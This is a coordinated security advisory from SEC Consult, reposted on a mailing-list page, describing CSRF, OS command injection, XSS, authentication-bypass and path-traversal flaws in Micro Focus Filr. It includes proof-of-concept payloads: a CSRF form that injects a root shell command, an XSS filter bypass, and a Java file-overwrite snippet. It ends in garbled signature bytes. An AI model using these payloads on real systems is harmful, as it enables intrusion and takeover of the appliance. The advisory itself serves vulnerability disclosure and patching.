SEC Consult SA-20160725-0 :: Multiple vulnerabilities in Micro Focus (Novell) Filr Jul 25 2016 09:02AM
SEC Consult Vulnerability Lab (research sec-consult com)
SEC Consult Vulnerability Lab Security Advisory < 20160725-0 >
title: Multiple vulnerabilities
product: Micro Focus (former Novell) Filr Appliance
vulnerable version: Filr 2 <=, Filr 1.2 <=
fixed version: Filr 2 v2.0.0.465, Filr 1.2 v1.2.0.871
CVE number: CVE-2016-1607, CVE-2016-1608, CVE-2016-1609
CVE-2016-1610, CVE-2016-1611
impact: critical
homepage: https://www.novell.com/products/filr/
found: 2016-05-23
by: W. Ettlinger (Office Vienna)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Bangkok - Berlin - Linz - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich


Vendor description:
"Unlike other mobile file access and collaborative file sharing solutions, Micro
Focus Filr has been designed with the enterprise in mind, resulting in less
administration, better security and more productive users."

URL: https://www.novell.com/products/filr/

Business recommendation:
During a very quick security check several vulnerabilities with high impact
have been discovered. SEC Consult recommends to immediately apply the patches
provided by Micro Focus to address these issues.

Please note that since SEC Consult did not conduct a thorough technical security
check SEC Consult cannot make a statement regarding the overall security of the
Micro Focus Filr appliance.

Vulnerability overview/description:
During a quick security check several vulnerabilities have been identified that
ultimately allow an attacker to completely compromise the appliance:

1) Cross Site Request Forgery (CSRF) - CVE-2016-1607
Several functions within the appliance's administative interface lack protection
against CSRF attacks. This allows an attacker who targets an authenticated
administrator to reconfigure the appliance.

2) OS Command Injection - CVE-2016-1608
The appliance administrative interface allows an authenticated attacker to
execute arbitrary operating system commands. Please note that an attacker can
combine this vulnerability with vulnerability #1. In this scenario, an attacker
does not need to be authenticated.

3) Insecure System Design
The appliance uses a Jetty application server to provide the appliance
administration interface. This application server is started as the superuser
"root". Please note that combined with vulnerability #1 and #2 an attacker can
run commands as the superuser "root" without the need for any authentication.
For vendor remark on #3 see solution section.

4) Persistent Cross-Site Scripting - CVE-2016-1609
The Filr web interface uses a blacklist filter to try to strip any JavaScript
code from user input. However, this filter can be bypassed to persistently
inject JavaScript code into the Filr web interface.

5) Missing Cookie Flags
The httpOnly cookie flag is not set for any session cookies set by both the
administrative appliance web interface and the Filr web interface. Please note
that combined with vulnerability #4 an attacker can steal session cookies of
both the appliance administration interface and the Filr web interface (since
cookies are shared across ports).
For vendor remark on #5 see solution section.

6) Authentication Bypass - CVE-2016-1610
An unauthenticated attacker is able to upload email templates.

7) Path Traversal - CVE-2016-1610
The functionality that allows an administrator to upload email templates fails
to restrict the directory the templates are uploaded to. Please note that
combined with vulnerability #6 an attacker is able to upload arbitray files with
the permissions of the system user "wwwrun".

8) Insecure File Permissions - CVE-2016-1611
A file that is run upon system user login is world-writeable. This allows a
local attacker with restricted privileges to inject commands that are being
executed as privileged users as soon as they log into the system. Please note
that combined with vulnerabilities #6 and #7 an unauthenticated attacker can
inject commands that are executed as privileged system users (e.g. root) using
the Filr web interface.

Proof of concept:
1, 2, 3)
The following HTML fragment demonstrates that using a CSRF attack (#1) system
commands can be injected (#2) that are executed as the user root (#3):

----- snip -----
<form action="https://<host>:9443/vaconfig/time" method="POST">
<input type="hidden" name="ntpServer" value="0.novell.pool.ntp.org
1.novell.pool.ntp.org';id>/tmp/test;'" />
<input type="hidden" name="region" value="europe" />
<input type="hidden" name="timeZone" value="Europe/Vienna" />
<input type="hidden" name="utc" value="true" />
<input type="hidden" name="_utc" value="on" />
<input type="submit" value="Submit request" />
----- snip -----

The following string demonstrates how the XSS filter can be circumvented:
<img src='>' onerror='alert(1)'>

This string can e.g. be used by a restricted user in the "phone" field of the
user profile. The script is executed by anyone viewing the profile (e.g. admins).

None of the session cookies are set with the httpOnly flag.

6, 7, 8)
The following Java fragment demonstrates how an unauthenticated attacker (#6)
can overwrite a file in the filesystem (#7 & #8) that is executed upon user
login of e.g. the root user:

----- snip -----
String sessionCookie = "sectest";
String host = "http://<host>/";

ProxySettings settings = new ProxySettings();
HttpCookie cookie = new HttpCookie("JSESSIONID", sessionCookie);

settings.setCookieManager(new CookieManager());
settings.getCookieManager().getCookieStore().add(new URI(host), cookie);

settings.setModuleBaseUrl(host + "ssf/gwt/");
GwtRpcService svc = SyncProxy.createProxy(GwtRpcService.class, settings);

VibeXsrfToken token = new VibeXsrfToken(
((HasRpcToken) svc).setRpcToken(token);

String fileName = "../../../../etc/profile.d/vainit.sh";
FileBlob fileBlob = new FileBlob(ReadType.TEXT, fileName, "", 1l, 4, 1l, false, 4l);
fileBlob.setBlobDataString("id > /tmp/profiledtest\n");
BinderInfo folderInfo = new BinderInfo();
folderInfo.setBinderId((long) 1);
VibeRpcCmd cmd = new UploadFileBlobCmd(folderInfo, fileBlob, true);
HttpRequestInfo ri = new HttpRequestInfo();
svc.executeCommand(ri, cmd);
----- snip -----

Vulnerable / tested versions:
The version of Micro Focus Filr was found to be vulnerable. This
version was the latest version at the time of the discovery.

According to the vendor, Filr 1.2 is also vulnerable.

Vendor contact timeline:
2016-05-23: Sending encrypted advisory to security (at) novell (dot) com [email concealed], Setting latest
possible release date to 2016-07-12
2016-05-24: Initial response from Micro Focus: forwarded the information to Filr
engineering team
2016-06-13: Micro Focus releases patch to address issue #8
2016-06-14: Requested status update
2016-06-14: Micro Focus expects release of the patches in early July
2016-06-30: Asking for status update, answer of Micro Focus
2016-07-06: Micro Focus needs more time to patch issues, release re-scheduled
for 15th
2016-07-12: Asking for status update; "final rounds of QA" at Micro Focus
2016-07-16: Postponing advisory release, patch not yet ready
2016-07-22: Patch release by Micro Focus
2016-07-25: Coordinated advisory release

The "Filr 2.0 Security Update 2" can be downloaded here and should
be applied immediately:
Those patches fix vulnerabilities #1, #2, #4, #6, #7

"Filr 1.2 Security Update 3" can be found here:

Knowledge base references at Micro Focus:
Issue #1: https://www.novell.com/support/kb/doc.php?id=7017786
Issue #2: https://www.novell.com/support/kb/doc.php?id=7017789
Issue #4: https://www.novell.com/support/kb/doc.php?id=7017787
Issue #6 & #7: https://www.novell.com/support/kb/doc.php?id=7017788

Local privilege escalation via insecure file permissions (#8) has
already been fixed in the Filr 2.0 security update 1 in June:

Issue #3: According to Micro Focus, Jetty actually runs as user
"vabase-jetty" but will pass commands off to another service on
the box that runs as root to perform privileged actions.
They have fixed the command injection in this release and the
next release will include much more stringent parameter validation
for passing the commands.

Issue #5: According to Micro Focus, a component of Filr does not
function properly when the httpOnly flag is enabled. This will be
addressed in a future release.


Advisory URL:


SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF W. Ettlinger / @2016

0? *?H?÷
 `?He0? *?H?÷
 ? 0?¯0?? à#Ë?S?­anzTgk!0
 0o1 0 USE10U
 AddTrust AB1&0$U AddTrust External TTP Network1"0 UAddTrust External CA Root0
200530104838Z0?1 0 UGB10UGreater Manchester10USalford10U
COMODO CA Limited1A0?U8COMODO SHA-256 Client Authentication and Secure Email CA0?"0
ÓJ¶ ?n¥=Ùº»þ¡?©.CRC|¯2PȦOZéØÏ?%?{?è0dæ¤øV?ý*$3?¬Dåi?£FKÂ3Ôé@?°±¬?@¹
µ?:?*S£Û= a<U?ÙNv%!)ú£|qvOîá_éûT?ÛÃ{5R·?Þ"=,0-1Y½R7°3i-CëúÖ¥ñ?wgQ?Ùî'ë¼¥8v?¤©
00U 0DU=0;09 7 5?3http://crl.usertrust.com/AddTrustExternalCARoot.crl05
 ?*n¬UÁ:«?ÅØíÍUóªka+À #?Åfjo±õ´µw^aß}þ³¤??üû[jr
Á?â?ûZBj#!éeÇõÕ»~ê?? bêÑ:,YÅ?3ò8?å¶ézyöJ&ú|?û?0?_0?G #äÆBýÖ=ªÑ?nKN.0
 0?1 0 UGB10UGreater Manchester10USalford10U
COMODO CA Limited1A0?U8COMODO SHA-256 Client Authentication and Secure Email CA0
170301235959Z0?U1 0 UAT1
0 U270010UNiederoesterreich10U Wr. Neustadt10U Komarigasse 141.0,U
%SEC Consult Unternehmensberatung GmbH1I0GU @Issued through SEC Consult Unternehmensberatung GmbH E-PKI Manag10U Corporate Secure Email1&0$USEC Consult Vulnerability Lab1'0% *?H?÷
 research (at) sec-consult (dot) com0 [email concealed]?"0
?ª!å?J?ÿ̶à?d8Lþ5n.<À?î,ah%Â໐ÑRØDʵ?ü?HØÞ6k??»Äg| ĤYDÓÁ?õ?ƽ
?0?¹??¾®O_N?;ô¡0?<¡?=ü¢?¤ûÙ~R¹ºìÛð?Æ=ÈLÇßhwRuï ðÚf§ñ6ß7õø
ç??VÔåZ¹Y# p;?oÆ@3LÓ'?EÂ+Bâ??µÄ½³f­Á ?ýMÁ]Ãräþ­£?à0?Ü0U#0??ak?ᢠªOìgñ£÷´?Áì0UÈ3­~
?¾á¼¤<"Ç©2²¦O0Uÿ 0 Uÿ00U%0++0FU ?0=0; +²10+0)+https://secure.comodo.net/CPS0]UV0T0R P
omodoca.com0#U0research (at) sec-consult (dot) com0 [email concealed]
¢»¿Ö;?·¦b?äÅhøÕ?!J+æ rK?Bå?Çÿ?!>?Ó6/?hTBwT?l¿¹ùÁ6¹0ß3gKß5¦ÐJ8
?}¸ÛÔ%Q N?lr#té?ÀhM¡P&'aì}Äãå£DÝ/ôV/­èÃÜ?:?öQu' %FaU?iKÚÙ?]G°õ9,ÑÒ?Vr¦NGÆ?0iæNR£ÂæKÌëìû?Â5?|eÁ\`é#mn\ë?0J?
4» £ Î?æSv¦¬}O"aÌc7¸¯®+ËzìÝ1?A0?=0°0?1 0 UGB10UGreater Manchester10USalford10U
COMODO CA Limited1A0?U8COMODO SHA-256 Client Authentication and Secure Email CA#äÆBýÖ=ªÑ?nKN.0
 `?He ?a0 *?H?÷
 1  *?H?÷
0 *?H?÷
160725090240Z0/ *?H?÷
 1" &ʤN)ñ´ÁS¬¹*o,f K;°{
Ý\ª[0l *?H?÷
 1_0]0  `?He*0  `?He0
(0Á +?71³0°0?1 0 UGB10UGreater Manchester10USalford10U
COMODO CA Limited1A0?U8COMODO SHA-256 Client Authentication and Secure Email CA#äÆBýÖ=ªÑ?nKN.0Ã *?H?÷
  1³ °0?1 0 UGB10UGreater Manchester10USalford10U
COMODO CA Limited1A0?U8COMODO SHA-256 Client Authentication and Secure Email CA#äÆBýÖ=ªÑ?nKN.0
?zeq[Ç{ÛÅ;«h?OUG«û$¡LùÚlj}Å?glûs5¾mÅ:>jÙ= +JnK¹ìò VF ð¢V_???^Ï
Sukâ JȍTt»\Áß;ãn1®Å!??Â+ÀÕß[5Ù²Ó=ï§Jh±â"~òòéÞ?¿$ºþH?7²ñà5s?êËO`O¤
T¬Ë é${ï`æqÃÇ?¼?ô@ ²àçFÙ´!o??ÿ?¸ k]cÊ{xP¸<? ®??*??þ1?¤½eÞìU¾LÄýø`ސÉ?¯r?ûYEJSðºÿ·³)e¹<ÅhàÛô?Ü

[ reply ]


Privacy Statement
Copyright 2010, SecurityFocus